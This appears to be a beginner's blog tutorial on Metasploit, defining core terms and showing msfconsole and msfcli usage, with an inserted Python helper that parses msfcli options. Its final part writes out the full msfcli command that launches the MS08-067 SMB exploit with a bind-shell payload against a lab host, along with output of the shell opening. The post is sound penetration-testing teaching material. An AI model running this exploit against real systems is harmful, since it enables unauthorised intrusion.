METASPLOIT Framework BASICS
METASPLOIT BASICS
Throughout this post, we’ll use various terms that first bear some explanation. The majority of the following basic terms are defined in the context of Metasploit, but they are generally the same throughout the security industry.
Exploit :
An exploit is the means by which an attacker, or pentester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended. Common exploits include buffer overflows, web application vulnerabilities (such as SQL injection), and configuration errors.
Payload :
A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a bind shell is a payload that “binds” a command prompt to a listening port on the target machine, to which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.
Shellcode :
Shellcode is a set of instructions used as a payload when exploitation occurs. Shellcode is typically written in assembly language. In most cases, a command shell or a Meterpreter shell will be provided after the series of instructions have been performed by the target machine, hence the name.
Module :
A module is a piece of software that can be used by the Metasploit Framework. At times, you may require the use of an exploit module, a software component that conducts the attack. Other times, an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of what makes the Framework so powerful.
Listener :
A listener is a component within Metasploit that waits for an incoming connection of some sort. For example, after the target machine has been exploited, it may call the attacking machine over the Internet. The listener handles that connection, waiting on the attacking machine to be contacted by the exploited system.
Metasploit Interfaces :
Metasploit offers more than one interface to its underlying functionality, including console, command line, and graphical interfaces. In addition to these interfaces, utilities provide direct access to functions that are normally internal to the Metasploit Framework. These utilities can be invaluable for exploit development and situations for which you do not need the flexibility of the entire Framework.
MSFconsole :
Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It is one of the most flexible, feature-rich, and well supported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framework; it’s like a one-stop shop for all of your exploitation dreams. You can use msfconsole to do everything, including launching an exploit, loading auxiliary modules, performing enumeration, creating listeners, or running mass exploitation against an entire network.
Although the Metasploit Framework is constantly changing, a subset of commands remain relatively constant. By mastering the basics of msfconsole, you will be able to keep up with any changes. To illustrate the importance of learning msfconsole,
Starting MSFconsole :
To launch msfconsole, enter msfconsole at the command line:
root@bt:/# cd /opt/framework3/msf3/
root@bt:/opt/framework/msf3# msfconsole
< metasploit >
------------
\
,__,
\ (oo)____
(__) )\
||--|| *
msf >
---------------------------------------------------------
To access msfconsole’s help files, enter help followed by the command in which you are interested. In the next example, we are looking for help for the command connect, which allows us to communicate with a host. The resulting documentation lists usage, a description of the tool, and the various option flags.
msf > help connect
MSFcli :
Msfcli and msfconsole take very different approaches to providing access to the Framework. Where msfconsole provides an interactive way to access all features in a user-friendly manner, msfcli puts the priority on scripting and interoperability with other console-based tools. Instead of providing a unique interpreter to the Framework, msfcli runs directly from the command line, which allows you to redirect output from other tools into msfcli and direct msfcli output to other command-line tools. Msfcli also supports the launching of exploits and auxiliary modules, and it can be convenient when testing modules or developing new exploits for the Framework. It is a fantastic tool for unique exploitation when you know exactly which exploit and options you need. It is less forgiving than msfconsole, but it offers some basic help (including usage and a list of modes) with the command msfcli -h, as shown here:
root@bt:/opt/framework3/msf3# msfcli -h
Usage: /opt/framework3/msf3/msfcli
<exploit_name> <option=value> [mode]
==========================
Mode Description
(H)elp You're looking at it, baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
Sample Usage :
Let’s take a look at how you might use msfcli. Don’t worry about the details; these examples are intended to give you a sense of how you might work with this interface. When you are first learning Metasploit or whenever you get stuck, you can see the options available in a module by appending the letter O to the end of the string at whichever point you are stuck. For example, in the following listing, we use the O to see the options available for the ms08_067_netapi module:
root@bt:/# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...
Name Current Setting Required Description
-------------------
RHOST 0.0.0.0 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
-----------
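The usage line from msfcli -h (<exploit_name> <option=value> [mode]) and the option table printed by the O mode are both simple enough to parse, and doing so shows what msfcli actually does with the string you type. The following is an added example, not code from the original post or from Metasploit: it splits an msfcli argument string into module, options and mode, reads the O-mode table using the column positions of its header, and reports which required options are still unresolved before E would ever be reached. The option table embedded below is a constructed copy of the ms08_067_netapi listing shown above, and every function name is this example's own.

```python
"""Added example, not part of the original post or of Metasploit itself.

Parses an msfcli argument string of the form shown in the msfcli help
output, '<exploit_name> <option=value> [mode]', and checks it against the
module's option table as printed by the O mode, so that missing required
options are caught before the E mode is reached. The option table below is
a constructed copy of the ms08_067_netapi listing from the post; the
function names are this example's own."""

# Modes listed by 'msfcli -h'; (AC) is the only two-letter mode.
MSFCLI_MODES = {"H", "S", "O", "A", "I", "P", "T", "AC", "C", "E"}

# Constructed sample: the O-mode option table, column-aligned as msfcli prints it.
SAMPLE_OPTIONS_TABLE = """\
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    0.0.0.0          yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
"""


def parse_msfcli_args(argstring):
    """Split '<module> <opt=value> ... [mode]' into (module, options, mode).

    The trailing mode is optional; msfcli shows help when it is absent,
    so 'H' is used as the default here."""
    tokens = argstring.split()
    if not tokens:
        raise ValueError("empty msfcli argument string")
    module = tokens[0]
    mode = "H"
    # The last token is a mode only if it is a bare mode letter, not opt=value.
    if len(tokens) > 1 and "=" not in tokens[-1] and tokens[-1].upper() in MSFCLI_MODES:
        mode = tokens.pop().upper()
    options = {}
    for token in tokens[1:]:
        if "=" not in token:
            raise ValueError(f"expected option=value, got {token!r}")
        name, value = token.split("=", 1)
        options[name.upper()] = value  # normalised to match the table's NAME column
    return module, options, mode


def parse_options_table(text):
    """Parse the O-mode table into {NAME: {setting, required, description}}.

    Column boundaries are taken from the header line, so a blank Current
    Setting field (an option with no default) does not shift the remaining
    fields the way a naive whitespace split would."""
    lines = text.splitlines()
    header_idx = next(i for i, line in enumerate(lines) if line.startswith("Name"))
    header = lines[header_idx]
    starts = [header.index(col) for col in ("Name", "Current Setting", "Required", "Description")]
    ends = starts[1:] + [None]
    table = {}
    for line in lines[header_idx + 1:]:
        if not line.strip() or line.lstrip().startswith("-"):
            continue  # skip the dashed underline and blank lines
        name, setting, required, description = (line[a:b].strip() for a, b in zip(starts, ends))
        table[name] = {
            "setting": setting,
            "required": required.lower() == "yes",
            "description": description,
        }
    return table


def missing_required(table, supplied):
    """Required options neither given on the command line nor already
    resolved by a usable current setting.

    0.0.0.0 is treated as unset: it is the unspecified address, not a host."""
    unresolved = []
    for name, row in table.items():
        if not row["required"] or name in supplied:
            continue
        if row["setting"] in ("", "0.0.0.0"):
            unresolved.append(name)
    return sorted(unresolved)


def review_command(argstring, table_text):
    """What would msfcli be asked to do, and is anything required still missing?"""
    module, options, mode = parse_msfcli_args(argstring)
    table = parse_options_table(table_text)
    return {
        "module": module,
        "mode": mode,
        "options": options,
        "missing": missing_required(table, options),
    }


if __name__ == "__main__":
    for cmd in (
        "windows/smb/ms08_067_netapi O",
        "windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E",
    ):
        print(cmd, "->", review_command(cmd, SAMPLE_OPTIONS_TABLE))
```

Run it as a script and the first command reports RHOST as missing while the second reports nothing missing, which matches why the post sets RHOST before asking for payloads and executing. Parsing by header column position rather than splitting on whitespace is the detail worth keeping: real option tables often have an empty Current Setting column, and a whitespace split silently shifts the Required value into the wrong field.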
You can see that the module requires three options: RHOST, RPORT, and SMBPIPE. Now, by adding a P, we can check for available payloads:
root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
[*] Please wait while we load the module tree...
Compatible payloads
===================
----
Name Description
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
-----------
Having set all the required options for our exploit and selecting a payload, we can run our exploit by passing the letter E to the end of the msfcli argument string, as shown here:
root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
We’re successful, because we have received a Windows command prompt from the remote system.
Thanks for reading this blog, or if you just scrolled to here... 😂😂
(Suggest me topics to cover.) (My first blog, don't judge.)